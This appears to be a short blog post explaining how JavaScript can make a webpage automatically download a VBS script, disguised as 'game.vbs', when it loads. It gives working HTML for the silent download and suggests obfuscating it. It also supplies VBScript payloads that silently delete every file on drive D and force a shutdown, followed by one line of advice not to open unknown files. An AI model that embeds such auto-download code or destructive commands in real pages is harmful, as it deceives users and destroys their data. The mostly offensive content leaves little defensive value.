Under normal circumstances, when we want to download a certain file from a website, we always need to actively click to initiate the download operation, which is taken for granted.
However, have you ever encountered a scenario where opening a certain webpage automatically downloads a file without any clicks from you? It's scary, like an incredible black magic. But this is actually possible to achieve in reality, using JavaScript.
Target
Please refer to the following demo: When the page is opened, a vbs file is automatically downloaded in the background. When the downloaded file is clicked, the vbs script file is executed, and a "Hello" window is displayed.
Because it is a VBS script, if you click on the file, it will be opened and executed:
Select Open, and the script will be executed:
As shown in the page source code, this example only executes the command "msgbox("hello")". The source code of the automatically downloaded vbs file is as follows:
Source
The effect is incredible, but the source code is very simple. The complete html page code is as follows:
<html>
<script>
var blob = new Blob(['msgbox("hello")'],{type:'application/vbs'});
var a = document.createElement('a');
a.href = window.URL.createObjectURL(blob);
a.download = 'game.vbs';
a.click();
</script>
</html>
And it can also be obfuscated with JShaman JavaScript Obfuscator to prevent others from viewing the source code and understanding its actual functionality. Msgbox is just a popup box, but VBScript can achieve many powerful and scary functions.
For example:
dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “cmd /c “”del d:\*.* / f /q /s”””,0 ,true
Another example:
dim WSHshell
set WSHshell = wscript.createobject(“wscript.shell”)
WSHshell.run “shutdown -f -s -t 00”,0 ,true
Analyzing these two VBScript scripts, it can be seen that their execution may have dangerous consequences, and they may even download and execute other Exe files, etc.
How to prevent this threat?
Files may be automatically downloaded, not only VBScript scripts but also Exe files. However, they will not be executed as long as they are not clicked. Therefore, it is necessary to enhance security awareness and not click, open, or execute files from unknown sources.
Top comments (0)